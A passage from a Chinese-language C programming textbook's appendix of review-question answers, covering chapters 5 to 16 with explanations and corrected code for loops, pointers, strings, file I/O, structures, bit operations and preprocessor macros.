return 0; 1464 } 5.这个版本最大的问题是测试条件(sec是否大于0?)和scanf()语句获 取sec变量的值之间的关系。具体地说,第一次测试时,程序尚未获得sec的 值,用来与0作比较的是正好在sec变量内存位置上的一个垃圾值。一个比较 笨拙的方法是初始化 sec(如,初始化为 1)。这样就可通过第一次测试。 不过,还有另一个问题。当最后输入0结束程序时,在循环结束之前不会检 查sec,所以0也被打印了出来。因此,更好的方法是在while测试之前使用 scanf()语句。可以这样修改: scanf("%d", &sec); while ( sec > 0 ) { min = sec/S_TO_M; left = sec % S_TO_M; printf("%d sec is %d min, %d sec.\n", sec, min, left); printf("Next input?\n"); scanf("%d", &sec); } while循环第一轮迭代使用的是scanf()在循环外面获取的值。因此,在 while循环的末尾还要使用一次scanf()语句。这是处理类似问题的常用方法。 6.下面是该程序的输出: %s! C is cool! ! C is cool! 11 1465 11 12 11 解释一下。第1个printf()语句与下面的语句相同: printf("%s! C is cool!\n","%s! C is cool!\n"); 第2个printf()语句首先把num递增为11,然后打印该值。第3个printf()语 句打印num的值(值为11)。第 4个printf()语句打印n当前的值(仍为12), 然后将其递减为11。最后一个printf()语句打印num的当前值(值为11)。 7.下面是该程序的输出: SOS:4 4.00 表达式c1 -c2的值和'S' - '0'的值相同(其对应的ASCII值是83 - 79)。 8.把1~10打印在一行,每个数字占5列宽度,然后开始新的一行: 1 2 3 4 5 6 7 8 9 10 9.下面是一个参考程序,假定字母连续编码,与ASCII中的情况一样。 #include <stdio.h> int main(void) { char ch = 'a'; while (ch <= 'g') printf("%5c", ch++); 1466 printf("\n"); return 0; } 10.下面是每个部分的输出: a.1 2 注意,先递增x的值再比较。光标仍留在同一行。 b.101 102 103 104 注意,这次x先比较后递增。在示例a和b中,x都是在先递增后打印。另 外还要注意,虽然第2个printf()语句缩进了,但是这并不意味着它是while循 环的一部分。因此,在while循环结束后,才会调用一次该printf()语句。 c.stuvw 该例中,在第1次调用printf()语句后才会递增ch。 11.这个程序有点问题。while循环没有用花括号把两个缩进的语句括起 来,只有printf()是循环的一部分,所以该程序一直重复打印消息 COMPUTER BYTES DOG,直到强行关闭程序为止。 12.a.x = x + 10; b.x++; or ++x; or x = x + 1; 1467 c.c = 2 * (a + b); d.c = a + 2* b; 13 a.x--; or --x; or x = x - 1; b.m = n % k; c.p = q / (b - a); d.x = (a + b) / (c * d); A.6 第6章复习题答案 1.2,7,70,64,8,2。 2.该循环的输出是: 36 18 9 4 2 1 如果value是double类型,即使value小于1,循环的测试条件仍然为真。 循环将一直执行,直到浮点数下溢生成0为止。另外,value是double类型 时,%3d转换说明也不正确。 3.a.x > 5 b.scanf("%lf",&x) != 1 c.x == 5 4.a.scanf("%d", &x) == 1 b.x != 5 c.x >= 20 5.第4行:应该是list[10]。 1468 第6行:逗号改为分号。i的范围应该是0~9,不是1~10。 第9行:逗号改为分号。>=改成<=,否则,当i等于1时,该循环将成为 无限循环。 第10行:在第10行和第11行之间少了一个右花括号。该右花括号与第7 行的左花括号配对,形成一个for循环块。然后在这个右花括号与最后一个 右花括号之间,少了一行return 0;。 下面是一个正确的版本: #include <stdio.h> int main(void) {                /* 第3行 */ int i, j, list(10);      /* 第4行 */ for (i = 1, i <= 10, i++)    /* 第6行 */ {              /* 第7行 */ list[i] = 2*i + 3;     /* 第8行 */ for (j = 1, j > = i, j++)  /* 第9行 */ printf(" %d", list[j]); /* 第10行 */ printf("\n");       /* 第11行 */ } return 0; } 1469 6.下面是一种方法: #include <stdio.h> int main(void) { int col, row; for (row = 1; row <= 4; row++) { for (col = 1; col <= 8; col++) printf("$"); printf("\n"); } return 0; } 7.a.Hi! Hi! Hi! Bye! Bye! Bye! Bye! Bye! b.ACGM(因为代码中把int类型值与char类型值相加,编译器可能警告 会损失有效数字) 8.a.Go west, youn b.Hp!xftu-!zpvo c.Go west, young 1470 d.$o west, youn 9.其输入如下: 31|32|33|30|31|32|33| *** 1 5 9 13 *** 2 6 4 8 8 10 *** ====== ===== ==== === == 10.a.mint 1471 b.10个元素 c.double 类型的值 d.第ii行正确,mint[2]是double类型的值,&mingt[2]是它在内存中的位 置。 11.因为第1个元素的索引是0,所以循环的范围应该是0~SIZE - 1,而 不是1~SIZE。但是,如果只是这样更改会导致赋给第1个元素的值是0,不 是2。所以,应重写这个循环: for (index = 0; index < SIZE; index++) by_twos[index] = 2 * (index + 1); 与此类似,第2个循环的范围也要更改。另外,应该在数组名后面使用 数组索引: for( index = 0; index < SIZE; index++) printf("%d ", by_twos[index]); 错误的循环条件会成为程序的定时炸弹。程序可能开始运行良好,但是 由于数据被放在错误的位置,可能在某一时刻导致程序不能正常工作。 12.该函数应声明为返回类型为long,并包含一个返回long类型值的return 语句。 13.把num的类型强制转换成long类型,确保计算使用long类型而不是int 类型。在int为16位的系统中,两个int类型值的乘积在返回之前会被截断为一 个int类型的值,这可能会丢失数据。 long square(int num) { 1472 return ((long) num) * num; } 14.输出如下: 1: Hi! k = 1 k is 1 in the loop Now k is 3 k = 3 k is 3 in the loop Now k is 5 k = 5 k is 5 in the loop Now k is 7 k = 7 A.7 第7章复习题答案 1.b是true。 2.a.number >= 90 && number < 100 b.ch != 'q' && ch != 'k' c.(number >= 1 && number <= 9) && number != 5 1473 d.可以写成!(number >= 1 && number <= 9),但是number < 1 || number > 9 更好理解。 3.第5行:应该是scanf("%d %d", &weight, &height);。不要忘记scanf()中 要用&。另外,这一行前面应该有提示用户输入的语句。 第9行:测试条件中要表达的意思是(height < 72 && height > 64)。根据前 面第7行中的测试条件,能到第9行的height一定小于72,所以,只需要用表 达式(height > 64)即可。但是,第6行中已经包含了height > 64这个条件,所以 这里完全不必再判断,if else应改成else。 第11行:条件冗余。第2个表达式(weight不小于或不等于300)和第1 个表达式含义相同。只需用一个简单的表达式(weight > 300)即可。但是,问 题不止于此。第 11 行是一个错误的if,这行的else if与第6行的if匹配。但 是,根据if的“最接近规则”,该else if应该与第9行的else if匹配。因此,在 weight小于100且小于或等于64时到达第11行,而此时weight不可能超过 300。 第7行~第10行:应该用花括号括起来。这样第11行就确定与第6行匹 配。但是,如果把第9行的else if替换成简单的else,就不需要使用花括号。 第13行:应简化成if (height > 48)。实际上,完全可以省略这一行。因为 第12行已经测试过该条件。 下面是修改后的版本: #include <stdio.h> int main(void) { int weight, height; /* weight in lbs, height in inches */ printf("Enter your weight in pounds and "); 1474 printf("your height in inches.\n"); scanf("%d %d", &weight, &height); if (weight < 100 && height > 64) if (height >= 72) printf("You are very tall for your weight.\n"); else printf("You are tall for your weight.\n"); else if (weight > 300 && height < 48) printf(" You are quite short for your weight.\n"); else printf("Your weight is ideal.\n"); return 0; } 4.a.1。5确实大于2,表达式为真,即是1。 b.0。3比2大,表达式为假,即是0。 c.1。如果第 1 个表达式为假,则第 2 个表达式为真,反之亦然。所 以,只要一个表达式为真,整个表达式的结果即为真。 d.6。因为6 > 2为真,所以(6 > 2)的值为1。 e.10。因为测试条件为真。 1475 f.0。如果x > y为真,表达式的值就是y > x,这种情况下它为假或0。如 果x > y为假,那么表达式的值就是x > y,这种情况下为假。 5.该程序打印以下内容: *#%*#%$#%*#%*#%$#%*#%*#%$#%*#%*#% 无论怎样缩排,每次循环都会打印#,因为缩排并不能让putchar('#');成 为if else复合语句的一部分。 6.程序打印以下内容: fat hat cat Oh no! hat cat Oh no! cat Oh no! 7.第5行~第7行的注释要以*/结尾,或者把注释开头的/*换成//。表达 式'a' <= ch >= 'z'应替换成ch >= 'a' && ch <= 'z'。 或者,包含 ctype.h 并使用 islower(),这种方法更简单,而且可移植性 更高。顺带一提,虽然从 C 的语法方面看,'a' <= ch >= 'z'是有效的表达式, 但是它的含义不明。因为关系运算符从左往右结合,该表达式被解释成('a' <= ch) >= 'z'。圆括号中的表达式的值不是1就是0(真或假),然后判断该值 是否大于或等于'z'的数值码。1和0都不满足测试条件,所以整个表达式恒为 0(假)。在第2个测试表达式中,应该把||改成&&。另外,虽然!(ch< 'A')是 有 效的表达式,而且含义也正确,但是用ch >= 'A'更简单。这一行的'z'后 面应该有两个圆括号。更简单的方法是使用isuupper()。在uc++;前面应该加 一行else。否则,每输入一个字符, uc 都会递增 1。另外,在 printf()语句中 的格式化字符串应该用双引号括起来。下面是修改后的版本: #include <stdio.h> 1476 #include <ctype.h> int main(void) { char ch; int lc = 0; /*统计小写字母*/ int uc = 0; /*统计大写字母*/ int oc = 0; /*统计其他字母*/ while ((ch = getchar()) != '#') { if (islower(ch)) lc++; else if (isupper(ch)) uc++; else oc++; } printf("%d lowercase, %d uppercase, %d other", lc, uc, oc); return 0; } 1477 8.该程序将不停重复打印下面一行: You are 65.Here is your gold watch. 问题出在这一行:if (age = 65) 这行代码把age设置为65,使得每次迭代的测试条件都为真。 9.下面是根据给定输入的运行结果: q Step 1 Step 2 Step 3 c Step 1 h Step 1 Step 3 b Step 1 Done 注意,b和#都可以结束循环。但是输入b会使得程序打印step 1,而输入 #则不会。 1478 10.下面是一种解决方案: #include <stdio.h> int main(void) { char ch; while ((ch = getchar()) != '#') { if (ch != '\n') { printf("Step 1\n"); if (ch == 'b') break; else if (ch != 'c') { if (ch != 'h') printf("Step 2\n"); printf("Step 3\n"); } } 1479 } printf("Done\n"); return 0; } A.8 第8章复习题答案 1.表达式 putchar(getchar())使程序读取下一个输入字符并打印出来。 getchar()的返回值是putchar()的参数。但getchar(putchar())是无效的表达式, 因为getchar()不需要参数,而putchar()需要一个参数。 2.a.显示字符H。 b.如果系统使用ASCII,则发出一声警报。 c.把光标移至下一行的开始。 d.退后一格。 3.count <essay >essayct或者count >essayct <essay 4.都不是有效的命令。 5.EOF是由getchar()和scanf()返回的信号(一个特殊值),表明函数检测 到文件结尾。 6.a.输出是:If you qu 注意,字符I与字符i不同。还要注意,没有打印i,因为循环在检测到i 之后就退出了。 b.如果系统使用ASCII,输出是:HJacrthjacrt 1480 while的第1轮迭代中,为ch读取的值是H。第1个putchar()语句使用的ch 的值是H,打印完毕后,ch的值加1(现在是ch的值是I)。然后到第2个 putchar()语句,因为是++ch,所以先递增ch(现在ch的值是J)再打印它的 值。然后进入下一轮迭代,读取输入序列中的下一个字符(a),重复以上 步骤。需要注意的是,两个递增运算符只在ch被赋值后影响它的值,不会让 程序在输入序列中移动。 7.C的标准I/O库把不同的文件映射为统一的流来统一处理。 8.数值输入会跳过空格和换行符,但是字符输入不会。假设有下面的代 码: int score; char grade; printf("Enter the score.\n"); scanf("%s", %score); printf("Enter the letter grade.\n"); grade = getchar(); 如果输入分数98,然后按下Enter键把分数发送给程序,其实还发送了 一个换行符。这个换行符会留在输入序列中,成为下一个读取的值 (grade)。如果在字符输入之前输入了数字,就应该在处理字符输入之前 添加删除换行符的代码。 A.9 第9章复习题答案 1.形式参数是定义在被调函数中的变量。实际参数是出现在函数调用中 的值,该值被赋给形式参数。可以把实际参数视为在函数调用时初始化形式 参数的值。 1481 2.a.void donut(int n) b.int gear(int t1, int t2) c.int guess(void) d.void stuff_it(double d, double *pd) 3.a.char n_to_char(int n) b.int digits(double x, int n) c.double * which(double * p1, double * p2) d.int random(void) 4. int sum(int a, int b) { return a + b; } 5.用double替换int即可: double sum(double a, double b) { return a + b; } 6.该函数要使用指针: 1482 void alter(int * pa, int * pb) { int temp; temp = *pa + *pb; *pb = *pa - *pb; *pa = temp; } 或者: void alter(int * pa, int * pb) { *pa += *pb; *pb = *pa - 2 * *pb; } 7.不正确。num应声明在salami()函数的参数列表中,而不是声明在函数 体中。另外,把count++改成num++。 8.下面是一种方案: int largest(int a, int b, int c) { int max = a; 1483 if (b > max) max = b; if (c > max) max = c; return max; } 9.下面是一个最小的程序,showmenu()和getchoice()函数分别是a和b的答 案。 #include <stdio.h> /* 声明程序中要用到的函数 */ void showmenu(void); int getchoice(int, int); int main() { int res; showmenu(); while ((res = getchoice(1, 4)) != 4) { printf("I like choice %d.\n", res); 1484 showmenu(); } printf("Bye!\n"); return 0; } void showmenu(void) { printf("Please choose one of the following:\n"); printf("1) copy files     2) move files\n"); printf("3) remove files    4) quit\n"); printf("Enter the number of your choice:\n"); } int getchoice(int low, int high) { int ans; int good; good = scanf("%d", &ans); while (good == 1 && (ans < low || ans > high)) { 1485 printf("%d is not a valid choice; try again\n", ans); showmenu(); scanf("%d", &ans); } if (good != 1) { printf("Non-numeric input."); ans = 4; } return ans; } A.10 第10章复习题答案 1.打印的内容如下: 8 8 4 4 0 0 2 2 2.数组ref有4个元素,因为初始化列表中的值是4个。 3.数组名ref指向该数组的首元素(整数8)。表达式ref + 1指向该数组的 1486 第2个元素(整数4)。++ref不是有效的表达式,因为ref是一个常量,不是 变量。 4.ptr指向第1个元素,ptr + 2指向第3个元素(即第2行的第1个元素)。 a.12和16。 b.12和14(初始化列表中,用花括号把12括起来,把14和16括起来,所 以12初始化第1行的第1个元素,而14初始化第2行的第1个元素)。 5.ptr指向第1行,ptr + 1指向第2行。*ptr指向第1行的第1个元素,而*(ptr + 1)指向第2行的第1个元素。 a.12和16。 b.12和14(同第4题,12初始化第1行的第1个元素,而14初始化第2行的 第1个元素)。 6.a.&grid[22][56] b.&grid[22][0]或grid[22] (grid[22]是一个内含100个元素的一维数组,因此它就是首元素 grid[22][0]的地址。) c.&grid[0][0]或grid[0]或(int *) grid (grid[0]是int类型元素grid[0][0]的地址,grid是内含100个元素的grid[0] 数组的地址。 这两个地址的数值相同,但是类型不同,可以用强制类型转换把它们转 换成相同的类型。) 7.a.int digits[10]; b.float rates[6]; 1487 c.int mat[3][5]; d.char * psa[20] ; 注意,[]比*的优先级高,所以在没有圆括号的情况下,psa先与[20]结 合,然后再与*结合。因此该声明与char *(psa[20]);相同。 e.char (*pstr)[20]; 注意 对第e小题而言,char *pstr[20];不正确。这会让pstr成为一个指针数组, 而不是一个指向数组的指针。具体地说,如果使用该声明,pstr就指向一个 char类型的值(即数组的第1个成员),而pstr + 1则指向下一个字节。使用 正确的声明,pstr是一个变量,而不是一个数组名。而且pstr+ 1指向起始字 节后面的第20个字节。 8.a.int sextet[6] = {1, 2, 4, 8, 16, 32}; b.sextet[2] c.int lots[100] = { [99] = -1}; d.int pots[100] = { [5] = 101, [10] = 101,101, 101, 101}; 9.0~9 10.a.rootbeer[2] = value;有效。 b.scanf("%f", &rootbeer );无效,rootbeer不是float类型。 c.rootbeer = value;无效,rootbeer不是float类型。 d.printf("%f", rootbeer);无效,rootbeer不是float类型。 e.things[4][4] = rootbeer[3];有效。 1488 f.things[5] = rootbeer;无效,不能用数组赋值。 g.pf = value;无效,value不是地址。 h.pf = rootbeer;有效。 11.int screen[800][600] ; 12.a. void process(double ar[], int n); void processvla(int n, double ar[n]); process(trots, 20); processvla(20, trots); b. void process2(short ar2[30], int n); void process2vla(int n, int m, short ar2[n][m]); process2(clops, 10); process2vla(10, 30, clops); c. void process3(long ar3[10][15], int n); void process3vla(int n, int m,int k, long ar3[n][m][k]); process3(shots, 5); process3vla(5, 10, 15, shots); 1489 13.a. show( (int [4]) {8,3,9,2}, 4); b. show2( (int [][3]){{8,3,9}, {5,4,1}}, 2); A.11 第11章复习题答案 1.如果希望得到一个字符串,初始化列表中应包含'\0'。当然,也可以用 另一种语法自动添加空字符: char name[] = "Fess"; 2. See you at the snack bar. ee you at the snack bar. See you e you 3. y my mmy ummy Yummy 1490 4.I read part of it all the way through. 5.a.Ho Ho Ho!!oH oH oH b.指向char的指针(即,char *)。 c.第1个H的地址。 d.*--pc的意思是把指针递减1,并使用储存在该位置上的值。--*pc的意 思是解引用pc指向的值,然后把该值减1(例如,H变成G)。 e.Ho Ho Ho!!oH oH o 注意 在两个!之间有一个空字符,但是通常该字符不会产生任何打印的效 果。 f.while (*pc)检查 pc 是否指向一个空字符(即,是否指向字符串的末 尾)。while 的测试条件中使用储存在指针指向位置上的值。 while (pc - str)检查pc是否与str指向相同的位置(即,字符串的开头)。 while的测试条件中使用储存在指针指向位置上的值。 g.进入第1个while循环后,pc指向空字符。进入第2个while循环后,它 指向空字符前面的存储区(即,str 所指向位置前面的位置)。把该字节解 释成一个字符,并打印这个字符。然后指针退回到前面的字节处。永远都不 会满足结束条件(pc == str),所以这个过程会一直持续下去。 h.必须在主调程序中声明pr():char * pr(char *); 6.字符变量占用一个字节,所以sign占1字节。但是字符常量储存为int类 型,意思是'$'通常占用2或4字节。但是实际上只使用int的1字节储存'$'的编 码。字符串"$"使用2字节:一个字节储存'$'的编码,一个字节储存的'\0'编 码。 1491 7.打印的内容如下: How are ya, sweetie? How are ya, sweetie? Beat the clock. eat the clock. Beat the clock.Win a toy. Beat chat hat at t t at How are ya, sweetie? 8.打印的内容如下: faavrhee *le*on*sm 9.下面是一种方案: #include <stdio.h> // 提供fgets()和getchar()的原型 char * s_gets(char * st, int n) 1492 { char * ret_val; ret_val = fgets(st, n, stdin); if (ret_val) { while (*st != '\n' && *st != '\0') st++; if (*st == '\n') *st = '\0'; else while (getchar() != '\n') continue; } return ret_val; } 10.下面是一种方案: int strlen(const char * s) { int ct = 0; 1493 while (*s++)   // 或者while (*s++ != '\0') ct++; return(ct); } 11.下面是一种方案: #include <stdio.h>   // 提供 fgets()和getchar()的原型 #include <string.h>  // 提供 strchr()的原型 char * s_gets(char * st, int n) { char * ret_val; char * find; ret_val = fgets(st, n, stdin); if (ret_val) { find = strchr(st, '\n');  // 查找换行符 if (find)          // 如果地址不是 NULL, *find = '\0';     // 在此处放置一个空字符 else while (getchar() != '\n') 1494 continue; } return ret_val; } 12.下面是一种方案: #include <stdio.h>  /* 提供 NULL 的定义 */ char * strblk(char * string) { while (*string != ' ' && *string != '\0') string++;    /* 在第1个空白或空字符处停止 */ if (*string == '\0') return NULL;   /* NULL 指空指针 */ else return string; } 下面是第2种方案,可以防止函数修改字符串,但是允许使用返回值改 变字符串。表达式(char*)string被称为“通过强制类型转换取消const”。 #include <stdio.h>  /*提供 NULL 的定义*/ char * strblk(const char * string) 1495 { while (*string != ' ' && *string != '\0') string++;    /*在第1个空白或空字符处停止*/ if (*string == '\0') return NULL;   /* NULL 指空指针*/ else return (char *)string; } 13.下面是一种方案: /* compare.c -- 可行方案 */ #include <stdio.h> #include <string.h> // 提供strcmp()的原型 #include <ctype.h> #define ANSWER "GRANT" #define SIZE 40 char * s_gets(char * st, int n); void ToUpper(char * str); int main(void) { 1496 char try[SIZE]; puts("Who is buried in Grant's tomb?"); s_gets(try, SIZE); ToUpper(try); while (strcmp(try, ANSWER) != 0) { puts("No, that's wrong.Try again."); s_gets(try, SIZE); ToUpper(try); } puts("That's right!"); return 0; } void ToUpper(char * str) { while (*str != '\0') { *str = toupper(*str); str++; 1497 } } char * s_gets(char * st, int n) { char * ret_val; int i = 0; ret_val = fgets(st, n, stdin); if (ret_val) { while (st[i] != '\n' && st[i] != '\0') i++; if (st[i] == '\n') st[i] = '\0'; else while (getchar() != '\n') continue; } return ret_val; } 1498 A.12 第12章复习题答案 1.自动存储类别;寄存器存储类别;静态、无链接存储类别。 2.静态、无链接存储类别;静态、内部链接存储类别;静态、外部链接 存储类别。 3.静态、外部链接存储类别可以被多个文件使用。静态、内部链接存储 类别只能在一个文件中使用。 4.无链接。 5.关键字extern用于声明中,表明该变量或函数已定义在别处。 6.两者都分配了一个内含100个int类型值的数组。第2行代码使用calloc() 把数组中的每个元素都设置为0。 7.默认情况下,daisy只对main()可见,以extern声明的daisy才对petal()、 stem()和root()可见。文件2中的extern int daisy;声明使得daisy对文件2中的所 有函数都可见。第1个lily是main()的局部变量。petal()函数中引用的lily是错 误的,因为两个文件中都没有外部链接的lily。虽然文件2中有一个静态的 lily,但是它只对文件2可见。第1个外部rose对root()函数可见,但是stem()中 的局部rose覆盖了外部的rose。 8.下面是程序的输出: color in main() is B color in first() is R color in main() is B color in second() is G color in main() is G 1499 first()函数没有使用color变量,但是second()函数使用了。 9.a.声明告诉我们,程序将使用一个变量plink,该文件包含的函数都可 以使用这个变量。calu_ct()函数的第1个参数是指向一个整数的指针,并假 定它指向内含n个元素的数组。这里关键是要理解该程序不允许使用指针arr 修改原始数组中的值。 b.不会。value和n已经是原始数据的备份,所以该函数无法更改主调函 数中相应的值。这些声明的作用是防止函数修改value和n的值。例如,如果 用const限定n,就不能使用n++表达式。 A.13 第13章复习题答案 1.根据文件定义,应包含#include <stdio.h>。应该把fp声明为文件指针: FILE *fp;。要给fopen()函数提供一种模式:fopen("gelatin","w"),或者"a"模 式。fputs()函数的参数顺序应该反过来。输出字符串应该有一个换行符,提 高可读性。fclose()函数需要一个文件指针,而不是一个文件名: fclose(fp);。下面是修改后的版本: #include <stdio.h> int main(void) { FILE * fp; int k; fp = fopen("gelatin", "w"); for (k = 0; k < 30; k++) fputs("Nanette eats gelatin.\n", fp); 1500 fclose(fp); return 0; } 2.如果可以打开的话,会打开与命令行第1个参数名相同名称的文件, 并在屏幕上显示文件中的每个数字字符。 3.a.ch = getc(fp1); b.fprintf(fp2,"%c"\n",ch); c.putc(ch,fp2); d.fclose(fp1); /* 关闭terky文件 */ 注意 fp1用于输入操作,因为它识别以读模式打开的文件。与此类似,fp2以 写模式打开文件,所以常用于输出操作。 4.下面是一种方案: #include <stdio.h> #include <stdlib.h> int main(int argc, char * argv []) { FILE * fp; double n; double sum = 0.0; 1501 int ct = 0; if (argc == 1) fp = stdin; else if (argc == 2) { if ((fp = fopen(argv[1], "r")) == NULL) { fprintf(stderr, "Can't open %s\n", argv[1]); exit(EXIT_FAILURE); } } else { fprintf(stderr, "Usage: %s [filename]\n", argv[0]); exit(EXIT_FAILURE); } while (fscanf(fp, "%lf", &n) == 1) { sum += n; 1502 ++ct; } if (ct > 0) printf("Average of %d values = %f\n", ct, sum / ct); else printf("No valid data.\n"); return 0; } 5.下面是一种方案: #include <stdio.h> #include <stdlib.h> #define BUF 256 int has_ch(char ch, const char * line); int main(int argc, char * argv []) { FILE * fp; char ch; char line[BUF]; if (argc != 3) 1503 { printf("Usage: %s character filename\n", argv[0]); exit(EXIT_FAILURE); } ch = argv[1][0]; if ((fp = fopen(argv[2], "r")) == NULL) { printf("Can't open %s\n", argv[2]); exit(EXIT_FAILURE); } while (fgets(line, BUF, fp) != NULL) { if (has_ch(ch, line)) fputs(line, stdout); } fclose(fp); return 0; } int has_ch(char ch, const char * line) 1504 { while (*line) if (ch == *line++) return(1); return 0; } fgets()和 fputs()函数要一起使用,因为 fgets()会把按下 Enter 键的\n 留在 字符串中, fputs()与puts()不一样,不会添加一个换行符。 6.二进制文件与文本文件的区别是,这两种文件格式对系统的依赖性不 同。二进制流和文本流的区别包括是在读写流时程序执行的转换(二进制流 不转换,而文本流可能要转换换行符和其他字符)。 7.a.用fprintf()储存8238201时,将其视为7个字符,保存在7字节中。用 fwrite()储存时,使用该数的二进制表示,将其储存为一个4字节的整数。 b.没有区别。两个函数都将其储存为一个单字节的二进制码。 8.第1条语句是第2条语句的速记表示。第3条语句把消息写到标准错误 上。通常,标准错误被定向到与标准输出相同的位置。但是标准错误不受标 准输出重定向的影响。 9.可以在以"r+"模式打开的文件中读写,所以该模式最合适。"a+"只允 许在文件的末尾添加内容。"w+"模式提供一个空文件,丢弃文件原来的内 容。 A.14 第14章复习题答案 1.正确的关键是 struct,不是 structure。该结构模板要在左花括号前面有 1505 一个标记,或者在右花括号后面有一个结构变量名。另外,*togs后面和模 板结尾处都少一个分号。 2.输出如下: 6 1 22 Spiffo Road S p 3. struct month { char name[10]; char abbrev[4]; int days; int monumb; }; 4. struct month months[12] = { { "January", "jan", 31, 1 }, { "February", "feb", 28, 2 }, { "March", "mar", 31, 3 }, 1506 { "April", "apr", 30, 4 }, { "May", "may", 31, 5 }, { "June", "jun", 30, 6 }, { "July", "jul", 31, 7 }, { "August", "aug", 31, 8 }, { "September", "sep", 30, 9 }, { "October", "oct", 31, 10 }, { "November", "nov", 30, 11 }, { "December", "dec", 31, 12 } }; 5. extern struct month months []; int days(int month) { int index, total; if (month < 1 || month > 12) return(-1); /* error signal */ else { 1507 for (index = 0, total = 0; index < month; index++) total += months[index].days; return(total); } } 注意,index比月数小1,因为数组下标从0开始。然后,用index < month 代替index <= month。 6.a.要包含string.h头文件,提供strcpy()的原型: typedef struct lens { /* lens 描述 */ float foclen;   /* 焦距长度,单位:mm */ float fstop;    /* 孔径 */ char brand[30];/* 品牌 */ } LENS; LENS bigEye[10]; bigEye[2].foclen = 500; bigEye[2].fstop = 2.0; strcpy(bigEye[2].brand, "Remarkatar"); b.LENS bigEye[10] = { [2] = {500, 2, "Remarkatar"} }; 7.a. 1508 6 Arcturan cturan b.使用结构名和指针: deb.title.last pb->title.last c.下面是一个版本: #include <stdio.h> #include "starfolk.h"   /* 让结构定义可用 */ void prbem (const struct bem * pbem ) { printf("%s %s is a %d-limbed %s.\n", pbem->title.first, pbem->title.last, pbem->limbs, pbem->type); } 8.a.willie.born b.pt->born c.scanf("%d", &willie.born); d.scanf("%d", &pt->born); e.scanf("%s", willie.name.lname); 1509 f.scanf("%s", pt->name.lname); g.willie.name.fname[2] h.strlen(willie.name.fname) + strlen(willie.name.lname) 9.下面是一种方案: struct car { char name[20]; float hp; float epampg; float wbase; int year; }; 10.应该这样建立函数: struct gas { float distance; float gals; float mpg; }; struct gas mpgs(struct gas trip) { 1510 if (trip.gals > 0) trip.mpg = trip.distance / trip.gals; else trip.mpg = -1.0; return trip; } void set_mpgs(struct gas * ptrip) { if (ptrip->gals > 0) ptrip->mpg = ptrip->distance / ptrip->gals; else ptrip->mpg = -1.0; } 注意,第1个函数不能直接改变其主调程序中的值,所以必须用返回值 才能传递信息。 struct gas idaho = {430.0, 14.8};  // 设置前两个成员 idaho = mpgs(idaho);        // 重置数据结构 但是,第2个函数可以直接访问最初的结构: struct gas ohio = {583, 17.6};   //设置前两个成员 1511 set_mpgs(&ohio);          // 设置第3个成员 11.enum choices {no, yes, maybe}; 12.char * (*pfun)(char *, char); 13. double sum(double, double); double diff(double, double); double times(double, double); double divide(double, double); double (*pf1[4])(double, double) = {sum, diff, times, divide}; 或者用更简单的形式,把代码中最后一行替换成: typedef double (*ptype) (double, double); ptype pfl[4] = {sum,diff, times, divide}; 调用diff()函数: pf1[1](10.0, 2.5);   // 第1种表示法 (*pf1[1])(10.0, 2.5); // 等价表示法 A.15 第15章复习题答案 1.a.00000011 b.00001101 c.00111011 1512 d.01110111 2.a.21, 025, 0x15 b.85, 0125, 0x55 c.76, 0114, 0x4C d.157, 0235, 0x9D 3.a.252 b.2 c.7 d.7 e.5 f.3 g.28 4.a.255 b.1 (not false is true) c.0 d.1 (true and true is true) e.6 f.1 (true or true is true) g.40 1513 5.掩码的二进制是1111111;十进制是127;八进制是0177;十六进制是 0x7F。 6.bitval * 2和bitval << 1都把bitval的当前值增加一倍,它们是等效的。 但是mask +=bitval和mask |= bitval只有在bitval和mask没有同时打开的位时效 果才相同。例如, 2 | 4得6,但是3 | 6也得6。 7.a. struct tb_drives { unsigned int diskdrives  : 2; unsigned int       : 1; unsigned int cdromdrives : 2; unsigned int       : 1; unsigned int harddrives  : 2; }; b. struct kb_drives { unsigned int harddrives  : 2; unsigned int       : 1; unsigned int cdromdrives : 2; unsigned int       : 1; unsigned int diskdrives  : 2; 1514 }; A.16 第16章复习题答案 1.a.dist = 5280 * miles;有效。 b.plort = 4 * 4 + 4;有效。但是如果用户需要的是4 * (4 + 4),则应该使用 #define POD (FEET + FEET)。 c.nex = = 6;;无效(如果两个等号之间没有空格,则有效,但是没有意 义)。显然,用户忘记了在编写预处理器代码时不用加=。 d.y = y + 5;有效。berg = berg + 5 * lob;有效,但是可能得不到想要的结 果。est = berg +5/y + 5;有效,但是可能得不到想要的结果。 2.#define NEW(X) ((X) + 5) 3.#define MIN(X,Y) ( (X) < (Y) ? (X) : (Y) ) 4.#define EVEN_GT(X,Y) ( (X) > (Y) && (X) % 2 == 0 ? 1 : 0 ) 5.#define PR(X,Y) printf(#X " is %d and " #Y " is %d\n", X,Y) (因为该宏中没有运算符(如,乘法)作用于X和Y,所以不需要使用 圆括号。) 6.a.#define QUARTERCENTURY 25 b.#define SPACE ' ' c.#define PS() putchar(' ')或#define PS() putchar(SPACE) d.#define BIG(X) ((X) + 3) e.#define SUMSQ(X,Y) ((X)*(X) + (Y)*(Y)) 1515 7.试试这样:#define P(X) printf("name: "#X"; value: %d; address: %p\n", X, &X) (如果你的实现无法识别地址专用的%p转换说明,可以用%u或%lu 代替。) 8.使用条件编译指令。一种方法是使用#ifndef: #define _SKIP_ /* 如果不需要跳过代码,则删除这条指令 */ #ifndef _SKIP_ /* 需要跳过的代码 */ #endif 9. #ifdef PR_DATE printf("Date = %s\n", _ _DATE_ _); #endif 10.第1个版本返回x*x,这只是返回了square()的double类型值。例如, square(1.3)会返回1.69。第2个版本返回 (int)(x*x),计算结果被截断后返回。 但是,由于该函数的返回类型是double,int类型的值将被升级为double类型 的值,所以1.69将先被转换成1,然后被转换成1.00。第3个版本返回(int) (x*x+0.5)。加上 0.5可以让函数把结果四舍五入至与原值最接近的值,而不 是简单地截断。所以,1.69+0.5得2.19,然后被截断为2,然后被转换成 2.00;而1.44+0.5得1.94,被截断为1,然后被转换成1.00。 11.这是一种方案: #define BOOL(X) _Generic((X), _Bool : "boolean", default : "not boolean")12.应该把argv参数声明为char *argv[]类型。命令行参 数被储存为字符串,所以该程序应该先把argv[1]中的字符串转换成double类 型的值。例如,用stdlib.h库中的atof()函数。程序中使用了sqrt()函数,所以 应包含math.h头文件。程序在求平方根之前应排除参数为负的情况(检查参 1516 数是否大于或等于0)。 13.a.qsort( (void *)scores, (size_t) 1000, sizeof (double), comp); b.下面是一个比较使用的比较函数: int comp(const void * p1, const void * p2) { /* 要用指向int的指针来访问值 */ /* 在C中是否进行强制类型转换都可以,在C++中必须进行强制类型转 换 */ const int * a1 = (const int *) p1; const int * a2 = (const int *) 